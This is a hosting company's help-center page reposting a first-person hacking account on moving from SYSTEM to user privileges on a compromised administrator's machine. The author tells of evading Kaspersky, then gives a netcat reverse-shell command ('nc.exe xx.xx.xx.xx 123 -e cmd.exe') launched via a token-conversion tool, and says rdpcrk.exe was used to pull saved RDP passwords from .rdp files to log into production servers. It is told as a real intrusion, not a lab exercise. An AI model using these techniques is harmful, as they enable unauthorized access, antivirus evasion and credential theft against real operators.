• <ul id="mayc0"></ul>
    <ul id="mayc0"><center id="mayc0"></center></ul>
    <strike id="mayc0"><input id="mayc0"></input></strike>
    <ul id="mayc0"></ul>
  • 始創于2000年 股票代碼:831685
    咨詢熱線:0371-60135900 注冊有禮 登錄
    • 掛牌上市企業
    • 60秒人工響應
    • 99.99%連通率
    • 7*24h人工
    • 故障100倍補償
    您的位置: 網站首頁 > 幫助中心>文章內容

    將系統權限轉換為用戶權限

    發布時間:  2012/6/21 18:15:56

    幾天前費了不少力氣拿到一管理員機器,主站我盤旋了很久,沒有突破口,開了80,還有一個高端端口,當然就是3389了,一陣欣喜,管理員一定會登這個服務器的3389的。
         現在機器是拿到了,翻了翻管理員機器里的東西,本來想裝鍵盤記錄的,發現有很多以ip命名的rdp文件,下了一個下回來打開看了一下,真幸運,保存了密碼在rdp文件里的(這種情況只有讀rdp的密碼了,鍵盤記錄記不到)。主站和各分站的3389都是以保存密碼登錄的,上傳一個讀取rdp密碼的東西就可以讀到密碼了,但這時遇到一個很頭痛的問題,我的馬是系統權限的馬,讀取rdp文件的密碼必須要在用戶權限下。想裝一個用戶權限的馬上去,可手里沒好馬,管理員機器上裝了個卡巴斯基,還開了主動防御。試著折騰了一下,裝其它的馬,都被主動防御攔截,管理員還似乎有點發覺,開始檢查機器,幸好這個馬還穩當,先斷開連接。
         接下來仔細想了一下,到底咋搞呢,必須要得到一個用戶權限的shell,再上傳馬上去執行就不敢了,搞不好把現在的這個權限都弄掉。
         最后想起一個令牌轉換的東西,試了一下直接用令牌轉換工具運行rdpcrk.exe 加參數重定向到文本,結果沒讀取成功。于是就想到用nc通過令牌轉換彈一個用戶權限的shell回來。
    在馬里面執行cmd:change.exe  c:\windows\nc.exe xx.xx.xx.xx 123 -e cmd.exe
    在本地臨聽123端口,接到shell后,傳個東西上去,whoami,呵呵,終于得到一個用戶權限的shell。
    然后rdpcrk.exe  xx.xx.xx.xx.rdp
    成功得到密碼,直登服務器,搞定。

    億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
       聯系:億恩小凡
       QQ:89317007
       電話:0371-63322206


    本文出自:億恩科技【www.vbseamall.com】

    服務器租用/服務器托管中國五強!虛擬主機域名注冊頂級提供商!15年品質保障!--億恩科技[ENKJ.COM]

  • 您可能在找
  • 億恩北京公司:
  • 經營性ICP/ISP證:京B2-20150015
  • 億恩鄭州公司:
  • 經營性ICP/ISP/IDC證:豫B1.B2-20060070
  • 億恩南昌公司:
  • 經營性ICP/ISP證:贛B2-20080012
  • 服務器/云主機 24小時售后服務電話:0371-60135900
  • 虛擬主機/智能建站 24小時售后服務電話:0371-60135900
  • 專注服務器托管17年
    掃掃關注-微信公眾號
    0371-60135900
    Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技 版權所有  地址:鄭州市高新區翠竹街1號總部企業基地億恩大廈  法律顧問:河南亞太人律師事務所郝建鋒、杜慧月律師   京公網安備41019702002023號
      0
     
     
     
     

    0371-60135900
    7*24小時客服服務熱線